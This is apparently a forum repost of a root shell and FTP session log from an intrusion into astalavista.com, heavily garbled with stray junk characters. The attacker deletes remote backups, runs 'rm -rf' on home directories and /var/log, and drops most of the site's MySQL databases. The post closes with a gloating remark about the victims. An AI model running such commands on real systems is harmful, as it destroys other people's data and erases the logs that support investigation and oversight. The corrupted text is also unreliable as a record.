# k' Z5 B1 a/ F4 O7 ?2 g/ v-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz26 }# T9 q3 C+ h& L! a1 ]5 R
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
* d) w$ e) z2 V7 ]0 P% p5 E% S: J-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
& V: a; ] J( d9 [, }-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar; M0 S- ^# }+ L+ s
[snip]1 B' |0 P; E) l# S
226 Transfer complete.6 l% a: Q$ a8 F; F$ S4 K
ftp> mdelete *1 A5 [: o) v2 m- T5 @& w
ftp> ls -la/ {$ [" [2 X" {+ r5 q4 j
227 Entering Passive Mode (212,254,194,163,2,193)! P8 r5 _/ z$ F2 z' X: m. h
150 Opening BINARY mode data connection for ‘file list’.
0 ]% S7 _7 |8 \; B" p1 ^226 Transfer complete.8 N Q4 u% }+ y3 k1 V
ftp>
% N1 ~& ]6 ~5 V# }5 A2 N' J# q) ~3 F, F, W& S
sh-3.2# cd /home. Q* C, J( _ ^% C5 t0 V4 m! U
sh-3.2# ls -la" N" D0 d8 c% S& t
total 120
6 a4 d% t: g1 _drwxr-xr-x 14 root root 4096 Mar 11 17:56 .2 m0 `# N6 E: U. ~
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
! ~6 {( i+ d& A( M9 xdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
: v2 R9 e1 b4 L8 O-rw——- 1 root root 8192 Jun 4 03:03 aquota.group7 q& w3 i! n7 O' E
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
$ Q, @3 @$ A$ k5 I! Cdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet+ N9 {' _; B6 l$ ~. Y5 V7 I) d
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup n- Y7 J# N3 R2 b5 O
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
: |" }; i) T9 V5 h* o2 l4 cdrwx–x–x 10 com com 4096 Apr 28 12:40 com
' S Q( \3 M* K+ R6 q; Odrwxr-xr-x 2 root root 4096 May 17 2007 ftp4 Q" G0 S8 ~5 i3 }
drwx—— 3 jon jon 4096 Sep 21 2007 jon
$ C5 `6 y: z1 p' |& b1 F( Vdrwx—— 2 root root 16384 Sep 11 2007 lost+found' m' S3 q8 S7 R4 ?7 W1 q; ^
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
4 N. v3 w6 I# h8 @0 A i8 sdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata1 u/ l2 y' |0 C9 |. Y$ \
drwx—— 2 jon jon 4096 Sep 15 2007 test6 Q/ K/ [+ C8 n% l
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp- Q( [7 D, Z4 T) A. S
% T8 J* E% C I* V
sh-3.2# rm -rf backup/
+ ?! h* }/ ?6 h' m+ ]& o$ W4 B0 ush-3.2# rm -rf backup.14161/
1 @) Y# P& [( d, \sh-3.2# rm -rf ftp/7 B# B6 X) r" Z; D! k8 K5 L6 h
sh-3.2# rm -rf jon/
2 q5 {$ L3 u& B4 ksh-3.2# rm -rf my/
- g' C/ T& K8 T' }/ k) P$ Jsh-3.2# rm -rf mysqldata/* \9 a+ w, H5 v4 v$ c* h P) D
sh-3.2# rm -rf test/
# V, c" F+ N2 U( j1 ~6 vsh-3.2# rm -rf tmp/. W! L1 E0 b# `+ [' g1 y
sh-3.2# cd ~
, x6 \7 z0 a" s) u* R" tsh-3.2# rm -rf *
' J9 e% x3 K& ~5 Ssh-3.2# rm -rf /var/log/
+ z8 B3 s' V" V" U* urm: cannot remove directory `/var/log//proftpd’: Directory not empty6 \' p$ y1 B) F. f3 z
sh-3.2# rm -rf /home/*' V' N" d$ \+ ]* X9 k
sh-3.2# mysql
( `# C$ u( O. [: w* i- J+ RWelcome to the MySQL monitor. Commands end with ; or \g.
2 f0 R5 p2 W- q& ?) f: W5 Y- A. k2 H. DYour MySQL connection id is 407156
7 o% y! @( E; c& NServer version: 5.0.45-community-log MySQL Community Edition (GPL)
4 I9 z' C) ~. L9 ^1 M% Y/ I6 E% G6 ?
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
+ Y+ e1 ~$ }2 \9 D& V5 f: D$ _8 z
# V0 |) L# C, \ R7 Gmysql> show databases;' K* C0 O2 I; F% }3 r# ~
+———————–+
5 q* h& t- l) Y5 z| Database |
) t% ^8 F% i4 e1 ]* @' C6 a6 _1 @, s+———————–+" V. l- Y8 \+ @
| information_schema |
" V5 V1 r+ b) l8 X4 `/ w9 O7 [| astanet_ads |* j+ @- ^% D( q
| astanet_mailing_lists |' _7 c" m% K5 f
| astanet_mediawiki |' @; o: l1 z" E# K6 J1 v4 F
| astanet_membersystem |; {2 K. J6 V1 n. L& P
| com_contrexx |0 A3 e! X0 H j- ?, v# P; _
| com_contrexx2 |
. S6 b" H, s( f' v/ ]| com_contrexx2_live |
9 r( x n3 V" J/ N% e5 J| da_roundcube |
* p) `8 A/ y4 T) J| dolphin |! B4 D1 f, x( o$ N5 t f
| ideapool |; b& a: o3 a5 K1 v( O
| mysql |3 c, R4 p) t" N( c/ h6 o2 Q ]
| test |) w3 S1 g% Z. h1 V- M# {/ f
| yourmaster |; J& A/ U ~" i# {+ f
+———————–+
. M' b- f" D* t+ M9 `0 n14 rows in set (0.03 sec)
. Y* {& r+ T. U4 G% M
' B% ^( y; F" `. I- Q& f& `0 @2 Dmysql> drop database astanet_membersystem;
+ H# W4 }- F$ o) v& YdroQuery OK, 46 rows affected (0.81 sec), ?% O: `; ~+ L v
( T5 {% y9 V) J5 G; i% h) }& v
mysql> drop database com_contrexx;
' k6 n" @ Z* t4 vQuery OK, 211 rows affected (2.72 sec)
4 T, u5 F9 \0 Z0 w2 D* @( V6 F& f" v4 K# G) g
mysql> drop database com_contrexx2;% C G8 U w; P. v1 b4 y
Query OK, 237 rows affected (2.23 sec)
# y5 z2 h4 V: h& ?) I
- @) u7 [9 u0 x+ K ^% \# f" ~* Zmysql> drop database com_contrexx2_live;, j3 E6 d, |, C# w7 ^
Query OK, 227 rows affected (7.63 sec)$ i* s7 M$ O$ O( N. ?2 X; ?) w l
, t; R5 P/ u) U" Q4 O& [
mysql> drop database ideapool;
$ ]4 A S1 I% F% M* MQuery OK, 69 rows affected (0.19 sec)
- @6 g7 s' F8 e+ o1 |
8 }% ?" C' t. i J8 C( emysql> drop database yourmaster;
; V2 G1 |6 \, X1 A1 M/ X+ j+ lQuery OK, 158 rows affected (0.55 sec)
% A8 q( k. M, t3 H
3 K* x+ Q- g' M6 N5 j% D6 h+ r vmysql> drop database astanet_ads;0 X( V' h& g- R1 ]) `1 @3 l, K! I
Query OK, 9 rows affected (0.11 sec)
" f7 B2 {2 W) ?+ K. E7 U# r" v% A- {5 f4 t1 r
mysql> drop database astanet_mailing_lists;
* z7 C C8 H m6 O' cQuery OK, 24 rows affected (1.47 sec)
9 j. f; t5 C! n/ j$ x
7 E5 _8 ^3 E& v/ U* t. vmysql> drop database astanet_mediawiki;0 Q+ x8 F$ Y& q# |0 C [$ n2 X
Query OK, 31 rows affected (0.51 sec)
7 K( D' L: \5 n9 c( Y' X4 m8 b, `/ |. s9 S9 K" |
mysql> show databases;: c# s8 W- ]6 X' k
+——————–+
: L5 x% |4 n( U; K8 T) O: t( I| Database |! g% R9 c/ U4 ~& L: p
+——————–+5 \# N1 k% \* ~2 k- w
| information_schema |
0 I* u- r5 Q4 ^9 V$ {| da_roundcube |
: ~3 O5 z+ U' U7 M2 ]| dolphin |
# J6 j0 V" U- Y8 j! n+ ?7 J% f( L- s| mysql |
) V6 `+ h5 O8 }5 S7 e. R( p| test |
, V% L8 P0 O- w' b7 T2 q, m+——————–+( S T5 K" \5 H) H' v; i
5 rows in set (0.00 sec)
( ]# B, V& j8 ?3 \% @; c
2 Y' E# P' V" s, L. N9 W3 hWhat a journey! We’re not sure exactly why the “Terminator” had any influence on
$ l# |3 d% n+ vtheir naming (conventions) but we’re sure Arnold himself wouldn’t be in the
1 _5 e* s( u1 Y# i$ a* Bwrong to say this pack of morons *wont be back*.
3 W$ G% t: Z# A! |3 u9 X |
发表于 2012-11-6 21:07:34
收藏
支持
反对